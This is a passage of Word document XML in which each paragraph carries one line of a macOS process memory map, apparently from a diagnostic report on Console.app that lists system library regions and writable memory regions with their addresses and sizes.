    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd187f000-00007fffd18b8000 [  228K] r-x/r-x SM=COW  /usr/lib/libssl.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd18b8000-00007fffd1909000 [  324K] r-x/r-x SM=COW  /usr/lib/libstdc++.6.0.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd194a000-00007fffd194e000 [   16K] r-x/r-x SM=COW  /usr/lib/libutil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd194e000-00007fffd195c000 [   56K] r-x/r-x SM=COW  /usr/lib/libxar.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd195c000-00007fffd195f000 [   12K] r-x/r-x SM=COW  /usr/lib/libxcselect.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd195f000-00007fffd1a4f000 [  960K] r-x/r-x SM=COW  /usr/lib/libxml2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1a4f000-00007fffd1a79000 [  168K] r-x/r-x SM=COW  /usr/lib/libxslt.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1a79000-00007fffd1a8b000 [   72K] r-x/r-x SM=COW  /usr/lib/libz.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1a99000-00007fffd1a9e000 [   20K] r-x/r-x SM=COW  /usr/lib/system/libcache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1a9e000-00007fffd1aa9000 [   44K] r-x/r-x SM=COW  /usr/lib/system/libcommonCrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd1aa9000-00007fffd1ab1000 [   32K] r-x/r-x SM=COW  /usr/lib/system/libcompiler_rt.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1ab1000-00007fffd1aba000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libcopyfile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1aba000-00007fffd1b3d000 [  524K] r-x/r-x SM=COW  /usr/lib/system/libcorecrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b3d000-00007fffd1b70000 [  204K] r-x/r-x SM=COW  /usr/lib/system/libdispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b70000-00007fffd1b76000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libdyld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b76000-00007fffd1b77000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libkeymgr.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b77000-00007fffd1b84000 [   52K] r-x/r-x SM=COW  /usr/lib/system/libkxld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b84000-00007fffd1b85000 [    4K] r-x/r-x SM=COW  /usr/lib/system/liblaunch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b85000-00007fffd1b8b000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libmacho.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b8b000-00007fffd1b8e000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libquarantine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b8e000-00007fffd1b90000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libremovefile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1b90000-00007fffd1ba9000 [  100K] r-x/r-x SM=COW  /usr/lib/system/libsystem_asl.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1ba9000-00007fffd1baa000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libsystem_blocks.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1baa000-00007fffd1c38000 [  568K] r-x/r-x SM=COW  /usr/lib/system/libsystem_c.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1c38000-00007fffd1c3c000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libsystem_configuration.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd1c3c000-00007fffd1c40000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coreservices.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1c40000-00007fffd1c59000 [  100K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1c59000-00007fffd1c60000 [   28K] r-x/r-x SM=COW  /usr/lib/system/libsystem_dnssd.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1c60000-00007fffd1c8a000 [  168K] r-x/r-x SM=COW  /usr/lib/system/libsystem_info.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1c8a000-00007fffd1cad000 [  140K] r-x/r-x SM=COW  /usr/lib/system/libsystem_kernel.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1cad000-00007fffd1cf5000 [  288K] r-x/r-x SM=COW  /usr/lib/system/libsystem_m.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1cf5000-00007fffd1d14000 [  124K] r-x/r-x SM=COW  /usr/lib/system/libsystem_malloc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d14000-00007fffd1d6c000 [  352K] r-x/r-x SM=COW  /usr/lib/system/libsystem_network.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d6c000-00007fffd1d76000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_networkextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d76000-00007fffd1d80000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_notify.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d80000-00007fffd1d89000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_platform.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d89000-00007fffd1d94000 [   44K] r-x/r-x SM=COW  /usr/lib/system/libsystem_pthread.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d94000-00007fffd1d98000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libsystem_sandbox.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d98000-00007fffd1d9a000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libsystem_secinit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1d9a000-00007fffd1da2000 [   32K] r-x/r-x SM=COW  /usr/lib/system/libsystem_symptoms.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffd1da2000-00007fffd1dc3000 [  132K] r-x/r-x SM=COW  /usr/lib/system/libsystem_trace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1dc3000-00007fffd1dc9000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libunwind.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffd1dc9000-00007fffd1df3000 [  168K] r-x/r-x SM=COW  /usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__IMAGE                00007fffdeb05000-00007fffdeb89000 [  528K] r--/r-- SM=COW  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__UNICODE              00007fffdeb89000-00007fffdec14000 [  556K] r--/r-- SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             00007fffdee9b000-00007fffe5e09000 [111.4M] r--/r-- SM=COW  dyld shared cache combined __LINKEDIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          00007ffffffcc000-00007ffffffcd000 [    4K] r-x/r-x SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>==== Writable regions for process 23599</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000109f34000-0000000109f4e000 [  104K] rw-/rwx SM=COW  /Applications/Utilities/Console.app/Contents/MacOS/Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Kernel Alloc Once      0000000109f5c000-0000000109f5e000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000109fc6000-0000000109fe9000 [  140K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/ConsoleKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a021000-000000010a022000 [    4K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a023000-000000010a038000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a03a000-000000010a04f000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MALLOC metadata        000000010a051000-000000010a062000 [   68K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a063000-000000010a064000 [    4K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a065000-000000010a07a000 [   84K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010a07c000-000000010a091000 [   84K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Activity Tracing       000000010a093000-000000010a0d3000 [  256K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010b996000-000000010b997000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010b99e000-000000010b9a0000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE metadata  000000010b9a3000-000000010b9a4000 [    4K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010bc3d000-000000010bc46000 [   36K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010bc5e000-000000010bc5f000 [    4K] rw-/rwx SM=COW  ...works/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG backing stores      000000010bc69000-000000010bcd7000 [  440K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010bd44000-000000010bd47000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010bd47000-000000010bd48000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010c15d000-000000010c178000 [  108K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c178000-000000010c17a000 [    8K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010c17a000-000000010c17b000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000010c17c000-000000010c17d000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c180000-000000010c184000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c188000-000000010c189000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c18b000-000000010c18e000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c193000-000000010c197000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010c197000-000000010c198000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c19f000-000000010c1a5000 [   24K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1ab000-000000010c1ae000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c1ae000-000000010c1b3000 [   20K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1b3000-000000010c1b5000 [    8K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1b8000-000000010c1bb000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c1bb000-000000010c1bc000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1bc000-000000010c1c0000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c1c0000-000000010c1c1000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c1cd000-000000010c1cf000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010c1d9000-000000010c1da000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c1e8000-000000010c1ea000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1ee000-000000010c1fa000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c1fe000-000000010c201000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c201000-000000010c203000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010c217000-000000010c219000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c219000-000000010c221000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010c228000-000000010c229000 [    4K] rw-/rwx SM=COW  /usr/lib/libgermantok.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Foundation             000000010c237000-000000010c23c000 [   20K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c24c000-000000010c250000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010c262000-000000010c279000 [   92K] rw-/rw- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c27b000-000000010c298000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c2ac000-000000010c2b2000 [   24K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG backing stores      000000010c2b2000-000000010c2ba000 [   32K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010c2ca000-000000010c2ee000 [  144K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG backing stores      000000010c2ee000-000000010c35c000 [  440K] rw-/rw- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c35c000-000000010c379000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010c3a8000-000000010c3af000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Lookup.framework/Versions/A/Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c3bc000-000000010c3f6000 [  232K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010c403000-000000010c429000 [  152K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c429000-000000010c446000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c459000-000000010c45c000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
